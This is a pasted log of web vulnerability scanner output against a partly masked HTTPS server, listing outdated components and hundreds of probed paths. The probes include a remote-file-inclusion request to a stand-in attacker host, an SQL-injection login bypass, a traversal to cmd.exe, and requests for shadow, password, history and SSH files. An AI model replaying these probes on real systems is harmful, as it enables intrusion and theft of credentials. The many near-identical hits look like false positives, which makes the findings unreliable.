Advertisement
devildeeds

temp

Feb 21st, 2016
3,922
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 103.67 KB | None | 0 0
  1. + Target IP: 107.*.*.*
  2. + Target Hostname: *******
  3. + Target Port: 443
  4. + Start Time: 2016-02-22 10:43:53
  5. ---------------------------------------------------------------------------
  6. + Server: Apache/2.2.24 (Unix) mod_hive/3.6 mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 mod_wsgi/4.4.12 Python/2.6.6 mod_fcgid/2.3.6
  7. + No CGI Directories found (use '-C all' to force check all possible dirs)
  8. + Python/2.6.6 appears to be outdated (current is at least 2.6.10)
  9. + Number of sections in the version string differ from those in the database, the server reports: mod_wsgi/4.4.12 while the database has: 3.3. This may cause false positives.
  10. + Number of sections in the version string differ from those in the database, the server reports: openssl/1.0.0-fips while the database has: 1.0.0.100. This may cause false positives.
  11. + OpenSSL/1.0.0-fips appears to be outdated (current is at least 1.0.0d). OpenSSL 0.9.8r is also current.
  12. + mod_ssl/2.2.24 appears to be outdated (current is at least 2.8.31) (may depend on server version)
  13. + mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 mod_wsgi/4.4.12 Python/2.6.6 mod_fcgid/2.3.6 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
  14. + /SUNWmc/htdocs/: Sun SMC (Solaris Management Console) is running.
  15. + OSVDB-9392: /userinfo.php?uid=1;: Xoops portal gives detailed error messages including SQL syntax and may allow an exploit.
  16. + /level/42/exec/show%20conf: Retrieved Cisco configuration file.
  17. + OSVDB-6465: /mall_log_files/order.log: EZMall2000 exposes order information, http://www.ezmall2000.com/, see http://www.mindsec.com/advisories/post2.txt for details.
  18. + OSVDB-613: /SiteScope/htdocs/SiteScope.html: The SiteScope install may allow remote users to get sensitive information about the hosts being monitored.
  19. + OSVDB-3092: /clients/: This might be interesting...
  20. + OSVDB-3092: /css: This might be interesting...
  21. + OSVDB-3092: /includes/: This might be interesting...
  22. + OSVDB-3092: /js: This might be interesting...
  23. + OSVDB-3093: /admin/objects.inc.php4: This might be interesting... has been seen in web logs from an unknown scanner.
  24. + OSVDB-3093: /admin/script.php: This might be interesting... has been seen in web logs from an unknown scanner.
  25. + OSVDB-3093: /admin/settings.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  26. + OSVDB-3093: /admin/templates/header.php: This might be interesting... has been seen in web logs from an unknown scanner.
  27. + OSVDB-3093: /admin/upload.php: This might be interesting... has been seen in web logs from an unknown scanner.
  28. + OSVDB-3093: /admin_t/include/aff_liste_langue.php: This might be interesting... has been seen in web logs from an unknown scanner.
  29. + OSVDB-3093: /adv/gm001-mc/: This might be interesting... has been seen in web logs from an unknown scanner.
  30. + OSVDB-3093: /aff_news.php: This might be interesting... has been seen in web logs from an unknown scanner.
  31. + OSVDB-3093: /approval/ts_app.htm: This might be interesting... has been seen in web logs from an unknown scanner.
  32. + OSVDB-3093: /archive.asp: This might be interesting... has been seen in web logs from an unknown scanner.
  33. + OSVDB-3093: /archive_forum.asp: This might be interesting... has been seen in web logs from an unknown scanner.
  34. + OSVDB-3093: /ashnews.php: This might be interesting... has been seen in web logs from an unknown scanner.
  35. + OSVDB-3093: /auth.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
  36. + OSVDB-3093: /b2-tools/gm-2-b2.php: This might be interesting... has been seen in web logs from an unknown scanner.
  37. + OSVDB-3093: /bandwidth/index.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
  38. + OSVDB-3093: /basilix.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  39. + OSVDB-3093: /bigsam_guestbook.php?displayBegin=9999...9999: This might be interesting... has been seen in web logs from an unknown scanner.
  40. + OSVDB-3093: /bin/common/user_update_passwd.pl: This might be interesting... has been seen in web logs from an unknown scanner.
  41. + OSVDB-3093: /biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  42. + OSVDB-3093: /biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  43. + OSVDB-3093: /board/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  44. + OSVDB-3093: /board/philboard_admin.asp+: This might be interesting... has been seen in web logs from an unknown scanner.
  45. + OSVDB-3093: /bugtest+/+: This might be interesting... has been seen in web logs from an unknown scanner.
  46. + OSVDB-3093: /caupo/admin/admin_workspace.php: This might be interesting... has been seen in web logs from an unknown scanner.
  47. + OSVDB-3093: /ccbill/whereami.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
  48. + OSVDB-3093: /chat_dir/register.php: This might be interesting... has been seen in web logs from an unknown scanner.
  49. + OSVDB-3093: /checkout_payment.php: This might be interesting... has been seen in web logs from an unknown scanner.
  50. + OSVDB-3093: /communique.asp: This might be interesting... has been seen in web logs from an unknown scanner.
  51. + OSVDB-3093: /community/forumdisplay.php: This might be interesting... has been seen in web logs from an unknown scanner.
  52. + OSVDB-3093: /community/index.php?analized=anything: This might be interesting... has been seen in web logs from an unknown scanner.
  53. + OSVDB-3093: /community/member.php: This might be interesting... has been seen in web logs from an unknown scanner.
  54. + OSVDB-3093: /compte.php: This might be interesting... has been seen in web logs from an unknown scanner.
  55. + OSVDB-3093: /config/html/cnf_gi.htm: This might be interesting... has been seen in web logs from an unknown scanner.
  56. + OSVDB-3093: /convert-date.php: This might be interesting... has been seen in web logs from an unknown scanner.
  57. + OSVDB-3093: /cp/rac/nsManager.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
  58. + OSVDB-3093: /csPassword.cgi?command=remove%20: This might be interesting... has been seen in web logs from an unknown scanner.
  59. + OSVDB-3093: /cutenews/comments.php: This might be interesting... has been seen in web logs from an unknown scanner.
  60. + OSVDB-3093: /cutenews/search.php: This might be interesting... has been seen in web logs from an unknown scanner.
  61. + OSVDB-3093: /cutenews/shownews.php: This might be interesting... has been seen in web logs from an unknown scanner.
  62. + OSVDB-3093: /Data/settings.xml+: This might be interesting... has been seen in web logs from an unknown scanner.
  63. + OSVDB-3093: /database/metacart.mdb+: This might be interesting... has been seen in web logs from an unknown scanner.
  64. + OSVDB-3093: /db.php: This might be interesting... has been seen in web logs from an unknown scanner.
  65. + OSVDB-3093: /dbabble: This might be interesting... has been seen in web logs from an unknown scanner.
  66. + OSVDB-3093: /dcp/advertiser.php: This might be interesting... has been seen in web logs from an unknown scanner.
  67. + OSVDB-3093: /defines.php: This might be interesting... has been seen in web logs from an unknown scanner.
  68. + OSVDB-3093: /dltclnt.php: This might be interesting... has been seen in web logs from an unknown scanner.
  69. + OSVDB-3093: /doc/admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  70. + OSVDB-3093: /docs/NED: This might be interesting... has been seen in web logs from an unknown scanner.
  71. + OSVDB-3093: /dotproject/modules/files/index_table.php: This might be interesting... has been seen in web logs from an unknown scanner.
  72. + OSVDB-3093: /dotproject/modules/projects/addedit.php: This might be interesting... has been seen in web logs from an unknown scanner.
  73. + OSVDB-3093: /dotproject/modules/projects/view.php: This might be interesting... has been seen in web logs from an unknown scanner.
  74. + OSVDB-3093: /dotproject/modules/projects/vw_files.php: This might be interesting... has been seen in web logs from an unknown scanner.
  75. + OSVDB-3093: /dotproject/modules/tasks/addedit.php: This might be interesting... has been seen in web logs from an unknown scanner.
  76. + OSVDB-3093: /dotproject/modules/tasks/viewgantt.php: This might be interesting... has been seen in web logs from an unknown scanner.
  77. + OSVDB-3093: /do_map: This might be interesting... has been seen in web logs from an unknown scanner.
  78. + OSVDB-3093: /do_subscribe: This might be interesting... has been seen in web logs from an unknown scanner.
  79. + OSVDB-3093: /email.php: This might be interesting... has been seen in web logs from an unknown scanner.
  80. + OSVDB-3093: /emml_email_func.php: This might be interesting... has been seen in web logs from an unknown scanner.
  81. + OSVDB-3093: /emumail.cgi?type=.%00: This might be interesting... has been seen in web logs from an unknown scanner.
  82. + OSVDB-3093: /entete.php: This might be interesting... has been seen in web logs from an unknown scanner.
  83. + OSVDB-3093: /enteteacceuil.php: This might be interesting... has been seen in web logs from an unknown scanner.
  84. + OSVDB-3093: /etc/shadow+: This might be interesting... has been seen in web logs from an unknown scanner.
  85. + OSVDB-3093: /eventcal2.php.php: This might be interesting... has been seen in web logs from an unknown scanner.
  86. + OSVDB-3093: /ez2000/ezadmin.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
  87. + OSVDB-3093: /ez2000/ezboard.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
  88. + OSVDB-3093: /ez2000/ezman.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
  89. + OSVDB-3093: /faqman/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  90. + OSVDB-3093: /filemanager/index.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  91. + OSVDB-3093: /filemgmt/brokenfile.php: This might be interesting... has been seen in web logs from an unknown scanner.
  92. + OSVDB-3093: /filemgmt/singlefile.php: This might be interesting... has been seen in web logs from an unknown scanner.
  93. + OSVDB-3093: /filemgmt/viewcat.php: This might be interesting... has been seen in web logs from an unknown scanner.
  94. + OSVDB-3093: /filemgmt/visit.php: This might be interesting... has been seen in web logs from an unknown scanner.
  95. + OSVDB-3093: /foro/YaBB.pl: This might be interesting... has been seen in web logs from an unknown scanner.
  96. + OSVDB-3093: /forum/mainfile.php: This might be interesting... has been seen in web logs from an unknown scanner.
  97. + OSVDB-3093: /forum/member.php: This might be interesting... has been seen in web logs from an unknown scanner.
  98. + OSVDB-3093: /forum/newreply.php: This might be interesting... has been seen in web logs from an unknown scanner.
  99. + OSVDB-3093: /forum/newthread.php: This might be interesting... has been seen in web logs from an unknown scanner.
  100. + OSVDB-3093: /forum/viewtopic.php: phpBB found.
  101. + OSVDB-3093: /forum_arc.asp?n=268: This might be interesting... has been seen in web logs from an unknown scanner.
  102. + OSVDB-3093: /forum_professionnel.asp?n=100: This might be interesting... has been seen in web logs from an unknown scanner.
  103. + OSVDB-3093: /functions.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  104. + OSVDB-10447: /get_od_toc.pl?Profile=: WebTrends get_od_toc.pl may be vulnerable to a path disclosure error if this file is reloaded multiple times.
  105. + OSVDB-3093: /globals.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  106. + OSVDB-3093: /globals.pl: This might be interesting... has been seen in web logs from an unknown scanner.
  107. + OSVDB-6656: /Gozila.cgi: Linksys BEF Series routers are vulnerable to multiple DoS attacks in Gozila.cgi.
  108. + OSVDB-3093: /homebet/homebet.dll?form=menu&option=menu-signin: This might be interesting... has been seen in web logs from an unknown scanner.
  109. + OSVDB-3093: /idealbb/error.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  110. + OSVDB-3093: /iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  111. + OSVDB-3093: /include/customize.php: This might be interesting... has been seen in web logs from an unknown scanner.
  112. + OSVDB-3093: /include/help.php: This might be interesting... has been seen in web logs from an unknown scanner.
  113. + OSVDB-3093: /includes/footer.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  114. + OSVDB-3093: /includes/header.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  115. + OSVDB-3093: /infos/contact/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
  116. + OSVDB-3093: /infos/faq/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
  117. + OSVDB-3093: /infos/gen/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
  118. + OSVDB-3093: /infos/services/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
  119. + OSVDB-3093: /instaboard/index.cfm: This might be interesting... has been seen in web logs from an unknown scanner.
  120. + OSVDB-3093: /intranet/browse.php: This might be interesting... has been seen in web logs from an unknown scanner.
  121. + OSVDB-3093: /invitefriends.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  122. + OSVDB-3093: /ipchat.php: This might be interesting... has been seen in web logs from an unknown scanner.
  123. + OSVDB-3093: /ixmail_netattach.php: This might be interesting... has been seen in web logs from an unknown scanner.
  124. + OSVDB-3093: /jsptest.jsp+: This might be interesting... has been seen in web logs from an unknown scanner.
  125. + OSVDB-3093: /kernel/class/delete.php: This might be interesting... has been seen in web logs from an unknown scanner.
  126. + OSVDB-3093: /kernel/classes/ezrole.php: This might be interesting... has been seen in web logs from an unknown scanner.
  127. + OSVDB-3093: /ldap.search.php3?ldap_serv=nonsense%20: This might be interesting... has been seen in web logs from an unknown scanner.
  128. + OSVDB-3093: /livredor/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  129. + OSVDB-3093: /login.php3?reason=chpass2%20: This might be interesting... has been seen in web logs from an unknown scanner.
  130. + OSVDB-3093: /mail/include.html: This might be interesting... has been seen in web logs from an unknown scanner.
  131. + OSVDB-3093: /mail/settings.html: This might be interesting... has been seen in web logs from an unknown scanner.
  132. + OSVDB-3093: /mail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
  133. + OSVDB-3093: /mambo/banners.php: This might be interesting... has been seen in web logs from an unknown scanner.
  134. + OSVDB-3093: /manage/login.asp+: This might be interesting... has been seen in web logs from an unknown scanner.
  135. + OSVDB-3093: /mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F: This might be interesting... has been seen in web logs from an unknown scanner.
  136. + OSVDB-3093: /members/ID.pm: This might be interesting... has been seen in web logs from an unknown scanner.
  137. + OSVDB-3093: /members/ID.xbb: This might be interesting... has been seen in web logs from an unknown scanner.
  138. + OSVDB-3093: /mod.php: This might be interesting... has been seen in web logs from an unknown scanner.
  139. + OSVDB-3093: /modif/delete.php: This might be interesting... has been seen in web logs from an unknown scanner.
  140. + OSVDB-3093: /modif/ident.php: This might be interesting... has been seen in web logs from an unknown scanner.
  141. + OSVDB-3093: /modules/Downloads/voteinclude.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  142. + OSVDB-3093: /modules/Forums/attachment.php: This might be interesting... has been seen in web logs from an unknown scanner.
  143. + OSVDB-3093: /modules/Search/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  144. + OSVDB-3093: /modules/WebChat/in.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  145. + OSVDB-3093: /modules/WebChat/out.php: This might be interesting... has been seen in web logs from an unknown scanner.
  146. + OSVDB-3093: /modules/WebChat/quit.php: This might be interesting... has been seen in web logs from an unknown scanner.
  147. + OSVDB-3093: /modules/WebChat/users.php: This might be interesting... has been seen in web logs from an unknown scanner.
  148. + OSVDB-3093: /modules/Your_Account/navbar.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  149. + OSVDB-3093: /moregroupware/modules/webmail2/inc/: This might be interesting... has been seen in web logs from an unknown scanner.
  150. + OSVDB-3093: /msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  151. + OSVDB-3093: /myguestBk/add1.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  152. + OSVDB-3093: /myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  153. + OSVDB-3093: /myguestBk/admin/index.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  154. + OSVDB-3093: /netget?sid=Safety&msg=2002&file=Safety: This might be interesting... has been seen in web logs from an unknown scanner.
  155. + OSVDB-3093: /newtopic.php: This might be interesting... has been seen in web logs from an unknown scanner.
  156. + OSVDB-3093: /nphp/nphpd.php: This might be interesting... has been seen in web logs from an unknown scanner.
  157. + OSVDB-3093: /OpenTopic: This might be interesting... has been seen in web logs from an unknown scanner.
  158. + OSVDB-3093: /options.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  159. + OSVDB-3093: /oscommerce/default.php: This might be interesting... has been seen in web logs from an unknown scanner.
  160. + OSVDB-3093: /parse_xml.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
  161. + OSVDB-3093: /php/gaestebuch/admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  162. + OSVDB-3093: /php/php4ts.dll: This might be interesting... has been seen in web logs from an unknown scanner.
  163. + OSVDB-3093: /pks/lookup: This might be interesting... has been seen in web logs from an unknown scanner.
  164. + OSVDB-3093: /pm/lib.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
  165. + OSVDB-3093: /poppassd.php3+: This might be interesting... has been seen in web logs from an unknown scanner.
  166. + OSVDB-3093: /produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  167. + OSVDB-3093: /productcart/database/EIPC.mdb: This might be interesting... has been seen in web logs from an unknown scanner.
  168. + OSVDB-3093: /productcart/pc/Custva.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  169. + OSVDB-3093: /ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  170. + OSVDB-3093: /product_info.php: This might be interesting... has been seen in web logs from an unknown scanner.
  171. + OSVDB-3093: /prometheus-all/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  172. + OSVDB-3093: /protected/: This might be interesting... has been seen in web logs from an unknown scanner.
  173. + OSVDB-3093: /protected/secret.html+: This might be interesting... has been seen in web logs from an unknown scanner.
  174. + OSVDB-3093: /protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''=': This might be interesting... has been seen in web logs from an unknown scanner.
  175. + OSVDB-3093: /protection.php: This might be interesting... has been seen in web logs from an unknown scanner.
  176. + OSVDB-3093: /pt_config.inc: This might be interesting... has been seen in web logs from an unknown scanner.
  177. + OSVDB-3093: /pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4=bad%20: This might be interesting... has been seen in web logs from an unknown scanner.
  178. + OSVDB-3093: /pvote/del.php?pollorder=1%20: This might be interesting... has been seen in web logs from an unknown scanner.
  179. + OSVDB-3093: /quikmail/nph-emumail.cgi?type=../%00: This might be interesting... has been seen in web logs from an unknown scanner.
  180. + OSVDB-3093: /room/save_item.php: This might be interesting... has been seen in web logs from an unknown scanner.
  181. + OSVDB-3093: /screen.php: This might be interesting... has been seen in web logs from an unknown scanner.
  182. + OSVDB-3093: /scripts/tradecli.dll: This might be interesting... has been seen in web logs from an unknown scanner.
  183. + OSVDB-3093: /scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir: This might be interesting... has been seen in web logs from an unknown scanner.
  184. + OSVDB-3093: /security/web_access.html: This might be interesting... has been seen in web logs from an unknown scanner.
  185. + OSVDB-3093: /sendphoto.php: This might be interesting... has been seen in web logs from an unknown scanner.
  186. + OSVDB-3093: /servers/link.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
  187. + OSVDB-3093: /shop/php_files/site.config.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  188. + OSVDB-3093: /shop/search.php: This might be interesting... has been seen in web logs from an unknown scanner.
  189. + OSVDB-3093: /shop/show.php: This might be interesting... has been seen in web logs from an unknown scanner.
  190. + OSVDB-3093: /Site/biztalkhttpreceive.dll: This might be interesting... has been seen in web logs from an unknown scanner.
  191. + OSVDB-3093: /site_searcher.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
  192. + OSVDB-3093: /spelling.php3+: This might be interesting... has been seen in web logs from an unknown scanner.
  193. + OSVDB-3093: /squirrelmail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
  194. + OSVDB-3093: /staticpages/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  195. + OSVDB-3093: /status.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  196. + OSVDB-3093: /supporter/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  197. + OSVDB-3093: /supporter/tupdate.php: This might be interesting... has been seen in web logs from an unknown scanner.
  198. + OSVDB-3093: /sw000.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  199. + OSVDB-3093: /syslog.htm?%20: This might be interesting... has been seen in web logs from an unknown scanner.
  200. + OSVDB-3093: /technote/print.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
  201. + OSVDB-3093: /texis/websearch/phine: This might be interesting... has been seen in web logs from an unknown scanner.
  202. + OSVDB-3093: /tinymsg.php: This might be interesting... has been seen in web logs from an unknown scanner.
  203. + OSVDB-3093: /topic/entete.php: This might be interesting... has been seen in web logs from an unknown scanner.
  204. + OSVDB-3093: /topsitesdir/edit.php: This might be interesting... has been seen in web logs from an unknown scanner.
  205. + OSVDB-3093: /ttforum/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  206. + OSVDB-3093: /tutos/file/file_new.php: This might be interesting... has been seen in web logs from an unknown scanner.
  207. + OSVDB-3093: /tutos/file/file_select.php: This might be interesting... has been seen in web logs from an unknown scanner.
  208. + OSVDB-3093: /typo3/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
  209. + OSVDB-3093: /uifc/MultFileUploadHandler.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  210. + OSVDB-3093: /url.jsp: This might be interesting... has been seen in web logs from an unknown scanner.
  211. + OSVDB-3093: /useraction.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  212. + OSVDB-3093: /utils/sprc.asp+: This might be interesting... has been seen in web logs from an unknown scanner.
  213. + OSVDB-3093: /vars.inc+: This might be interesting... has been seen in web logs from an unknown scanner.
  214. + OSVDB-3093: /VBZooM/add-subject.php: This might be interesting... has been seen in web logs from an unknown scanner.
  215. + OSVDB-3093: /wbboard/profile.php: This might be interesting... has been seen in web logs from an unknown scanner.
  216. + OSVDB-3093: /wbboard/reply.php: This might be interesting... has been seen in web logs from an unknown scanner.
  217. + OSVDB-3093: /webcalendar/login.php: This might be interesting... has been seen in web logs from an unknown scanner.
  218. + OSVDB-3093: /webcalendar/view_m.php: This might be interesting... has been seen in web logs from an unknown scanner.
  219. + OSVDB-3093: /webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
  220. + OSVDB-3093: /webmail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
  221. + OSVDB-3093: /web_app/WEB-INF/webapp.properties: This might be interesting... has been seen in web logs from an unknown scanner.
  222. + OSVDB-3093: /XMBforum/buddy.php: This might be interesting... has been seen in web logs from an unknown scanner.
  223. + OSVDB-3093: /XMBforum/member.php: This might be interesting... has been seen in web logs from an unknown scanner.
  224. + OSVDB-3093: /x_stat_admin.php: This might be interesting... has been seen in web logs from an unknown scanner.
  225. + OSVDB-3093: /yabbse/Reminder.php: This might be interesting... has been seen in web logs from an unknown scanner.
  226. + OSVDB-3093: /yabbse/Sources/Packages.php: This might be interesting... has been seen in web logs from an unknown scanner.
  227. + OSVDB-3093: /zentrack/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  228. + OSVDB-3093: /_head.php: This might be interesting... has been seen in web logs from an unknown scanner.
  229. + OSVDB-3093: /ows-bin/oaskill.exe?abcde.exe: This might be interesting... has been seen in web logs from an unknown scanner.
  230. + OSVDB-3093: /ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah: This might be interesting... has been seen in web logs from an unknown scanner.
  231. + OSVDB-3093: /database/: Databases? Really??
  232. + OSVDB-3093: /.wwwacl: Contains authorization information
  233. + OSVDB-3093: /.www_acl: Contains authorization information
  234. + OSVDB-3093: /.htpasswd: Contains authorization information
  235. + OSVDB-3093: /.access: Contains authorization information
  236. + OSVDB-3093: /.addressbook: PINE addressbook, may store sensitive e-mail address contact information and notes
  237. + OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
  238. + OSVDB-3093: /.bash_history: A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.
  239. + OSVDB-3093: /.forward: User home dir was found with a mail forward file. May reveal where the user's mail is being forwarded to.
  240. + OSVDB-3093: /.history: A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.
  241. + OSVDB-3093: /.htaccess: Contains authorization information
  242. + OSVDB-3093: /.lynx_cookies: User home dir found with LYNX cookie file. May reveal cookies received from arbitrary web sites.
  243. + OSVDB-3093: /.mysql_history: Database SQL?
  244. + OSVDB-3093: /.passwd: Contains authorization information
  245. + OSVDB-3093: /.pinerc: User home dir found with a PINE rc file. May reveal system information, directories and more.
  246. + OSVDB-3093: /.plan: User home dir with a .plan, a now mostly outdated file for delivering information via the finger protocol
  247. + OSVDB-3093: /.proclog: User home dir with a Procmail log file. May reveal user mail traffic, directories and more.
  248. + OSVDB-3093: /.procmailrc: User home dir with a Procmail rc file. May reveal subdirectories, mail contacts and more.
  249. + OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
  250. + OSVDB-3093: /.rhosts: A user's home directory may be set to the web root, a .rhosts file was retrieved. This should not be accessible via the web.
  251. + OSVDB-3093: /.sh_history: A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.
  252. + OSVDB-3093: /.ssh: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
  253. + OSVDB-3093: /.ssh/authorized_keys: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
  254. + OSVDB-3093: /.ssh/known_hosts: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
  255. + OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
  256. + OSVDB-3233: /jservdocs/: Default Apache JServ docs should be removed.
  257. + OSVDB-3233: /tomcat-docs/index.html: Default Apache Tomcat documentation found.
  258. + OSVDB-3233: /akopia/: Akopia is installed.
  259. + OSVDB-3233: /ojspdemos/basic/hellouser/hellouser.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field.
  260. + OSVDB-3233: /ojspdemos/basic/simple/usebean.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field.
  261. + OSVDB-3233: /ojspdemos/basic/simple/welcomeuser.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field.
  262. + OSVDB-3233: /php/index.php: Monkey Http Daemon default PHP file found.
  263. + OSVDB-3233: /servlet/Counter: JRun default servlet found. All default code should be removed from servers.
  264. + OSVDB-3233: /servlet/DateServlet: JRun default servlet found. All default code should be removed from servers.
  265. + OSVDB-3233: /servlet/FingerServlet: JRun default servlet found. All default code should be removed from servers.
  266. + OSVDB-3233: /servlet/HelloWorldServlet: JRun default servlet found. All default code should be removed from servers.
  267. + OSVDB-3233: /servlet/SessionServlet: JRun or Netware WebSphere default servlet found. All default code should be removed from servers.
  268. + OSVDB-3233: /servlet/SimpleServlet: JRun default servlet found (possibly Websphere). All default code should be removed from servers.
  269. + OSVDB-3233: /servlet/SnoopServlet: JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers.
  270. + OSVDB-3233: /admcgi/contents.htm: Default FrontPage CGI found.
  271. + OSVDB-3233: /admcgi/scripts/Fpadmcgi.exe: Default FrontPage CGI found.
  272. + OSVDB-3233: /admisapi/fpadmin.htm: Default FrontPage file found.
  273. + OSVDB-3233: /bin/admin.pl: Default FrontPage CGI found.
  274. + OSVDB-3233: /bin/cfgwiz.exe: Default FrontPage CGI found.
  275. + OSVDB-3233: /bin/CGImail.exe: Default FrontPage CGI found.
  276. + OSVDB-3233: /bin/contents.htm: Default FrontPage CGI found.
  277. + OSVDB-3233: /bin/fpadmin.htm: Default FrontPage CGI found.
  278. + OSVDB-3233: /bin/fpremadm.exe: Default FrontPage CGI found.
  279. + OSVDB-3233: /bin/fpsrvadm.exe: Default FrontPage CGI found.
  280. + OSVDB-3233: /cgi-bin/admin.pl: Default FrontPage CGI found.
  281. + OSVDB-3233: /cgi-bin/cfgwiz.exe: Default FrontPage CGI found.
  282. + OSVDB-3233: /cgi-bin/CGImail.exe: Default FrontPage CGI found.
  283. + OSVDB-3233: /cgi-bin/contents.htm: Default FrontPage CGI found.
  284. + OSVDB-3233: /cgi-bin/fpadmin.htm: Default FrontPage CGI found.
  285. + OSVDB-3233: /cgi-bin/fpremadm.exe: Default FrontPage CGI found.
  286. + OSVDB-3233: /cgi-bin/fpsrvadm.exe: Default FrontPage CGI found.
  287. + OSVDB-3233: /scripts/admin.pl: Default FrontPage CGI found.
  288. + OSVDB-3233: /scripts/cfgwiz.exe: Default FrontPage CGI found.
  289. + OSVDB-3233: /scripts/CGImail.exe: Default FrontPage CGI found.
  290. + OSVDB-3233: /scripts/contents.htm: Default FrontPage CGI found.
  291. + OSVDB-3233: /scripts/fpadmin.htm: Default FrontPage CGI found.
  292. + OSVDB-3233: /scripts/fpcount.exe: Default FrontPage CGI found.
  293. + OSVDB-3233: /scripts/fpremadm.exe: Default FrontPage CGI found.
  294. + OSVDB-3233: /scripts/fpsrvadm.exe: Default FrontPage CGI found.
  295. + OSVDB-3233: /_private/: FrontPage directory found.
  296. + OSVDB-3233: /_private/orders.htm: Default FrontPage file found.
  297. + OSVDB-3233: /_private/orders.txt: Default FrontPage file found.
  298. + OSVDB-3233: /_private/register.htm: Default FrontPage file found.
  299. + OSVDB-3233: /_private/register.txt: Default FrontPage file found.
  300. + OSVDB-3233: /_private/registrations.txt: Default FrontPage file found.
  301. + OSVDB-3233: /_private/_vti_cnf/: FrontPage directory found.
  302. + OSVDB-3233: /_vti_bin/: FrontPage directory found.
